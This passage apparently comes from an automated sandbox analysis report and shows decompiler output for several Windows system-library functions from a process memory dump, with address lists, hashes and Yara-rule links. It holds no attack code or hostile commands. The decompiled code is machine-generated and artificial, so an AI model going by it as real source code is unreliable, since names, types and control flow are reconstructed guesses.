						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E037453CA(0);
						return E0371D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0370F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E036E3690(1, _t117, 0x36a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0370AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L036E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0370AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0374500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03709860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                      0x037451be
                                      0x037451c3
                                      0x037451c8
                                      0x037451cd
                                      0x037451d0
                                      0x037451d3
                                      0x037451d8
                                      0x037451db
                                      0x037451de
                                      0x037451e0
                                      0x037451e3
                                      0x037451e6
                                      0x037451e8
                                      0x03745342
                                      0x03745351
                                      0x03745356
                                      0x0374535a
                                      0x03745360
                                      0x03745363
                                      0x03745366
                                      0x03745369
                                      0x03745369
                                      0x0374536b
                                      0x0374536b
                                      0x03745370
                                      0x037453a3
                                      0x037453a4
                                      0x037453a6
                                      0x037453ab
                                      0x037453ab
                                      0x037453ae
                                      0x037453ae
                                      0x037453b5
                                      0x037453bf
                                      0x037453bf
                                      0x03745375
                                      0x03745396
                                      0x037453a0
                                      0x037453a0
                                      0x00000000
                                      0x03745396
                                      0x03745377
                                      0x03745379
                                      0x0374537f
                                      0x0374538c
                                      0x03745390
                                      0x00000000
                                      0x03745390
                                      0x037451ee
                                      0x037451f1
                                      0x03745301
                                      0x03745310
                                      0x03745315
                                      0x03745318
                                      0x0374531b
                                      0x03745320
                                      0x0374532e
                                      0x03745331
                                      0x00000000
                                      0x03745331
                                      0x03745328
                                      0x03745329
                                      0x00000000
                                      0x03745329
                                      0x037451fa
                                      0x03745235
                                      0x03745236
                                      0x03745239
                                      0x0374523f
                                      0x03745240
                                      0x03745241
                                      0x03745242
                                      0x03745246
                                      0x03745247
                                      0x0374524e
                                      0x03745251
                                      0x03745267
                                      0x03745269
                                      0x0374526e
                                      0x0374527d
                                      0x0374527e
                                      0x03745281
                                      0x03745282
                                      0x03745287
                                      0x03745288
                                      0x0374528a
                                      0x0374528f
                                      0x03745294
                                      0x00000000
                                      0x00000000
                                      0x0374529a
                                      0x0374529c
                                      0x0374529e
                                      0x0374529e
                                      0x037452a4
                                      0x037452b0
                                      0x00000000
                                      0x00000000
                                      0x037452ba
                                      0x037452bc
                                      0x037452bc
                                      0x037452d4
                                      0x037452d9
                                      0x037452dc
                                      0x037452e1
                                      0x00000000
                                      0x00000000
                                      0x037452e7
                                      0x037452f4
                                      0x00000000
                                      0x037452f4
                                      0x03745270
                                      0x00000000
                                      0x03745270
                                      0x037451fc
                                      0x037451fd
                                      0x03745202
                                      0x03745203
                                      0x03745205
                                      0x0374520a
                                      0x0374520f
                                      0x00000000
                                      0x00000000
                                      0x0374521b
                                      0x03745226
                                      0x0374522b
                                      0x0374521d
                                      0x0374521d
                                      0x03745222
                                      0x03745222
                                      0x0374522d
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: Legacy$UEFI
                                      • API String ID: 2994545307-634100481
                                      • Opcode ID: 276f7d470fced4c9a686cf5ccbe932033e56983d6e70ffe5de263488b9970651
                                      • Instruction ID: d46000a96cf08b109f482e2c3d725eb4e230a58e3c361661bb8ed2d85c04453c
                                      • Opcode Fuzzy Hash: 276f7d470fced4c9a686cf5ccbe932033e56983d6e70ffe5de263488b9970651
                                      • Instruction Fuzzy Hash: E2514CB5E007089FDB24DFA8C880AAEBBF8BF49714F14406DE559EB291E771AD00DB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036CB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E036CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x379f7a8);
				E0371D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0371D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0370D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0370F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0371DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0370B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0370B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0370E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0370A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                      0x036cb171
                                      0x036cb171
                                      0x036cb171
                                      0x036cb171
                                      0x036cb171
                                      0x036cb176
                                      0x036cb17b
                                      0x036cb180
                                      0x036cb186
                                      0x036cb18f
                                      0x036cb198
                                      0x036cb1a4
                                      0x036cb1aa
                                      0x03724802
                                      0x03724802
                                      0x03724805
                                      0x0372480c
                                      0x0372480e
                                      0x036cb1d1
                                      0x036cb1d3
                                      0x036cb1de
                                      0x036cb1de
                                      0x03724817
                                      0x0372481e
                                      0x03724820
                                      0x03724822
                                      0x03724822
                                      0x03724824
                                      0x03724824
                                      0x0372482a
                                      0x00000000
                                      0x00000000
                                      0x03724835
                                      0x0372483a
                                      0x0372483d
                                      0x0372483f
                                      0x03724842
                                      0x03724842
                                      0x03724842
                                      0x03724846
                                      0x0372484c
                                      0x0372484e
                                      0x03724851
                                      0x03724851
                                      0x03724853
                                      0x03724854
                                      0x03724854
                                      0x03724858
                                      0x0372485a
                                      0x0372485a
                                      0x0372485d
                                      0x0372485f
                                      0x03724861
                                      0x03724861
                                      0x03724866
                                      0x0372486b
                                      0x0372486e
                                      0x03724871
                                      0x03724876
                                      0x03724876
                                      0x03724878
                                      0x0372487b
                                      0x03724884
                                      0x03724884
                                      0x00000000
                                      0x0372487d
                                      0x0372487d
                                      0x03724882
                                      0x03724889
                                      0x03724889
                                      0x0372488f
                                      0x03724891
                                      0x037248e0
                                      0x037248e2
                                      0x037248e4
                                      0x037248e4
                                      0x037248e7
                                      0x037248e7
                                      0x037248ed
                                      0x037248f4
                                      0x037248f6
                                      0x03724951
                                      0x03724951
                                      0x03724953
                                      0x03724953
                                      0x03724956
                                      0x03724956
                                      0x03724958
                                      0x03724959
                                      0x03724959
                                      0x0372495d
                                      0x0372495d
                                      0x0372495f
                                      0x0372495f
                                      0x03724965
                                      0x03724969
                                      0x037249ba
                                      0x037249ba
                                      0x037249c1
                                      0x037249c5
                                      0x037249cc
                                      0x037249d4
                                      0x037249d7
                                      0x037249da
                                      0x037249e4
                                      0x037249e5
                                      0x037249f3
                                      0x03724a02
                                      0x00000000
                                      0x03724a02
                                      0x03724972
                                      0x03724974
                                      0x00000000
                                      0x00000000
                                      0x03724976
                                      0x03724979
                                      0x03724982
                                      0x03724983
                                      0x03724984
                                      0x0372498b
                                      0x0372498d
                                      0x03724991
                                      0x03724993
                                      0x03724999
                                      0x0372499d
                                      0x037249a2
                                      0x037249a2
                                      0x037249a2
                                      0x03724999
                                      0x037249ac
                                      0x00000000
                                      0x037249b3
                                      0x037248f8
                                      0x037248fe
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x037248fe
                                      0x03724895
                                      0x0372489c
                                      0x037248ad
                                      0x037248b2
                                      0x037248b5
                                      0x037248b7
                                      0x037248ba
                                      0x037248bc
                                      0x037248c6
                                      0x037248c6
                                      0x037248cb
                                      0x037248d1
                                      0x037248d4
                                      0x037248d8
                                      0x037248d8
                                      0x00000000
                                      0x037248d8
                                      0x037248be
                                      0x037248c0
                                      0x00000000
                                      0x00000000
                                      0x037248c2
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x037248c4
                                      0x00000000
                                      0x03724882
                                      0x0372487b
                                      0x03724904
                                      0x03724906
                                      0x00000000
                                      0x00000000
                                      0x03724908
                                      0x0372490e
                                      0x00000000
                                      0x00000000
                                      0x03724910
                                      0x03724917
                                      0x03724917
                                      0x00000000
                                      0x03724917
                                      0x036cb1ba
                                      0x037247f9
                                      0x037247fc
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x037247fc
                                      0x036cb1c0
                                      0x036cb1c0
                                      0x036cb1c3
                                      0x036cb1cb
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: _vswprintf_s
                                      • String ID:
                                      • API String ID: 677850445-0
                                      • Opcode ID: 1d46bacf3d1f640df4e4a9436c3fa0f2eabf5230ac4e5a7250abffefcec0010a
                                      • Instruction ID: fef743e2063add6368fbf6da6760927754c7e5b543c7bb3c6df08161b034087e
                                      • Opcode Fuzzy Hash: 1d46bacf3d1f640df4e4a9436c3fa0f2eabf5230ac4e5a7250abffefcec0010a
                                      • Instruction Fuzzy Hash: E351ED75D142A98ADB31CF6AC845BBEBFB0AF04710F1841ADE899AB281D7744941AF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036EB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 76%
                                      			E036EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x37bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E036E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03798CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03709E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0370B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0370CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E036E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03798F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0370AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x37b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x37b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x37b8628; // 0x0
							_t116 =  *0x37b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                      0x036eb94c
                                      0x036eb956
                                      0x036eb95c
                                      0x036eb95e
                                      0x036eb964
                                      0x036eb969
                                      0x036eb96d
                                      0x036eb96d
                                      0x036eb970
                                      0x036eb974
                                      0x036eb97a
                                      0x036ebadf
                                      0x036ebadf
                                      0x036ebae2
                                      0x036ebae4
                                      0x036ebae6
                                      0x036ebaf0
                                      0x03732cb8
                                      0x036ebaf6
                                      0x036ebaf6
                                      0x036ebaf6
                                      0x036ebafd
                                      0x036ebb1f
                                      0x036ebb1f
                                      0x036ebaff
                                      0x036ebb00
                                      0x036ebb00
                                      0x036ebb03
                                      0x036ebb03
                                      0x036ebacb
                                      0x036ebacf
                                      0x036ebad0
                                      0x036ebad1
                                      0x036ebadc
                                      0x036ebadc
                                      0x036eb980
                                      0x036eb980
                                      0x036eb988
                                      0x036eb98b
                                      0x036eb98d
                                      0x036eb990
                                      0x036eb993
                                      0x036eb999
                                      0x036eb99b
                                      0x036eb9a1
                                      0x036eb9a5
                                      0x036eb9aa
                                      0x036eb9b0
                                      0x036eb9bb
                                      0x036eb9c0
                                      0x036eb9c3
                                      0x036eb9ca
                                      0x036eb9cc
                                      0x036eb9cf
                                      0x036eb9d3
                                      0x036eb9d7
                                      0x036eba94
                                      0x036eba94
                                      0x036eba98
                                      0x036ebaa3
                                      0x03732ccb
                                      0x036ebaa9
                                      0x036ebaa9
                                      0x036ebaa9
                                      0x036ebab1
                                      0x03732cd5
                                      0x03732cdd
                                      0x03732cdd
                                      0x036ebabb
                                      0x036ebabc
                                      0x036ebac2
                                      0x036ebac3
                                      0x036ebac3
                                      0x036ebac6
                                      0x00000000
                                      0x036eb9dd
                                      0x036eb9dd
                                      0x036eb9e7
                                      0x036eb9e7
                                      0x036eb9ec
                                      0x036eb9ec
                                      0x036eb9f1
                                      0x036eb9f5
                                      0x036eb9fa
                                      0x036eba00
                                      0x036eba0c
                                      0x036eba10
                                      0x036eba10
                                      0x036eba12
                                      0x036eba18
                                      0x00000000
                                      0x00000000
                                      0x036ebb26
                                      0x036ebb26
                                      0x036eba1e
                                      0x036eba1e
                                      0x036eba23
                                      0x036eba25
                                      0x036eba2c
                                      0x036eba30
                                      0x036eba35
                                      0x036eba35
                                      0x036eba41
                                      0x036eba46
                                      0x036eba4c
                                      0x036eba50
                                      0x036eba54
                                      0x036eba6a
                                      0x036eba6e
                                      0x036eba70
                                      0x036eba74
                                      0x036eba78
                                      0x036eba7a
                                      0x036eba7c
                                      0x036eba8e
                                      0x036eba90
                                      0x036eba92
                                      0x036ebb14
                                      0x036ebb14
                                      0x036ebb16
                                      0x036ebb16
                                      0x00000000
                                      0x036eba7c
                                      0x036ebb0a
                                      0x036ebb0d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036ebb0f

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036EB9A5
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 885266447-0
                                      • Opcode ID: 6d3bc998bb48c5140bc005c9706b3f9d597a5e288fffa27a1c3c49039208164f
                                      • Instruction ID: 104974ae2f4cfac862723fabf139bf015ff80afd499336a36bca7a35929d4c9a
                                      • Opcode Fuzzy Hash: 6d3bc998bb48c5140bc005c9706b3f9d597a5e288fffa27a1c3c49039208164f
                                      • Instruction Fuzzy Hash: 53516C71609345DFCB20DF29C180A2AFBF9FB89600F18896EF5859B355D771E848CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E036F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t238;
				signed int _t242;
				signed int _t244;
				signed int _t247;
				signed int _t249;
				intOrPtr _t251;
				signed int _t254;
				signed int _t261;
				signed int _t264;
				signed int _t273;
				intOrPtr _t279;
				signed int _t281;
				signed int _t283;
				void* _t284;
				signed int _t287;
				signed int _t288;
				unsigned int _t291;
				signed int _t295;
				void* _t296;
				signed int _t297;
				signed int _t301;
				intOrPtr _t313;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t329;
				signed int _t330;
				intOrPtr* _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				void* _t340;
				signed int _t342;
				void* _t343;
				signed int _t346;
				void* _t347;

				_t338 = _t342;
				_t343 = _t342 - 0x4c;
				_v8 =  *0x37bd360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t329 = 0x37bb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t291 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t347 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t279 = 0x48;
				_t311 = 0 | _t347 == 0x00000000;
				_t322 = 0;
				_v37 = _t347 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t330 = 0xc0000106;
						goto L32;
					} else {
						_t329 = L036E4620(_t291,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t329;
						__eflags = _t329;
						if(_t329 == 0) {
							_t330 = 0xc0000017;
							goto L32;
						} else {
							 *(_t329 + 0x44) =  *(_t329 + 0x44) & 0x00000000;
							_t50 = _t329 + 0x48; // 0x48
							_t324 = _t50;
							_t311 = _v32;
							 *((intOrPtr*)(_t329 + 0x3c)) = _t279;
							_t281 = 0;
							 *((short*)(_t329 + 0x30)) = _v48;
							__eflags = _t311;
							if(_t311 != 0) {
								 *(_t329 + 0x18) = _t324;
